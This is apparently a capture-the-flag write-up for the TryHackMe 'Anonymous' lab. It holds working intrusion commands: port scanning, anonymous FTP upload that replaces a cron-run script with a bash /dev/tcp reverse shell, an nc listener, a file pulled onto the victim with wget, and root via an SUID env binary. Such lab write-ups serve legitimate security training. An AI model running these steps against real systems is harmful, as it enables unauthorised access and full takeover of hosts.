Anonymous — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Anonymous — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports.

nmap -A -T4 -v <ip>

As you can see, 4 ports are opening: FTP,SSH,SMB. As FTP can be login with anonymous, let’s try it.

ftp <ip>

There are 3 files in scripts folder. Get all of them to read using mget

mget *

Now let’s check content of those files. From the todo.txt, there is nothing valuable but told the user to disable anonymous FTP login. The will clean files in /tmp_files and then write result to removed_files.log. So maybe there will be a cronjob for this script.

This time using smbclient to search for shared folder.

smbclient -L <ip>

*Just press enter when it prompts for the password.

So there is a share folder called “pics”. Let’s see what’s inside this folder.

smbclient //<ip>/pics

Then dir to list files and mget * to download all the files to our machine

There are 2 photos. So likely there will be some hidden data inside these photos. Let’s extract it using some metadata tools like: steghide, exiftool, binwalk, stegcracker.

*if Stegcracker is included as default in your machine, download it from:

However, after a long wait, I cannot get any data from the image.

Let’s just get back to the FTP. As I said above, maybe there will be a cronjob of the file. So if we change the content of to a reverse shell script and replace the original script on the target machine, we will have our shell.

Exec this cmd to change content of

echo “bash -i >& /dev/tcp/<host-ip>/4444 0>&1” >

Then login again to ftp using anonymous, cd to scripts and use put to replace our with the original one.


As you can see, the has been replace with the reverse shell command.

Now start a listener in our machine:

nc -lvnp 4444

*Note that you can add “rlwrap” before nc command so that you can use arrow keys and mouse scroll in the shell.

You will have the shell:

Get our first flag:

Now let’s get root. As you can see from the ‘id’ command, this namelessone is in lxd group. Lxd is a docker in linux, and you can use this misconfiguration to get root priv.

After doing some research, I found this link. Follow step by step from the instruction to get root:,with%20the%20LXD%20snap%20package

First, clone the alpine builder repo and build:

git clone
cd lxd-alpine-builder

After the build has finished, you will see a .tar.gz file. Note the name, cause you will be using it from now on. Do not copy my file name, it will be different for each machine.

Now start a http server on the folder contains your .tar.gz file in order to transfer this file to the victim machine

python3 -m http.server 9000

or if you use python 2:

python -m SimpleHTTPServer 9000

On the victime machine, cd to /tmp (cause you will have all the permission in /tmp folder), use wget to get the .tar.gz file:

wget http://<host-ip>:9000/your-alpine-filename.tar.gz

The .tar.gz file has been transferred successfully.

Now run:

lxc image import ./your-alpine-file-name.tar.gz — alias myimage

run lxc image list to make sure that your image has been imported:

“myimage” has been imported successfully.

Now run this cmd to init our image:

lxc init myimage ignite -c security.privileged=true

OOPPS!!! There is no storage pool!! So we cannot use this way to get root…

Well let’s find another way…

find / -type f -perm -u=s 2>/dev/null

What this find does is that it will find all cmd with SUID execute permission. You can learn more by searching SUID Linux on Google.

I found an interesting command here. It’s env. Exec this cmd to spawn a bash shell as root

/usr/bin/env /bin/bash -p

As you can see, now I’m in the root group! Get the root.txt flag.

**Maybe many of you will ask why I didn’t delete the “lxd” part as it wasn’t successful. I wont’ because I want to show you that in real blackbox pentesting, we don’t know the exact way to exploit our victim machine. We need to try various ways again and again. Moreover, this time you cannot use the “lxd” method, but maybe it will work for another machine! So, learning is never redundant.

The end.


I’m Groot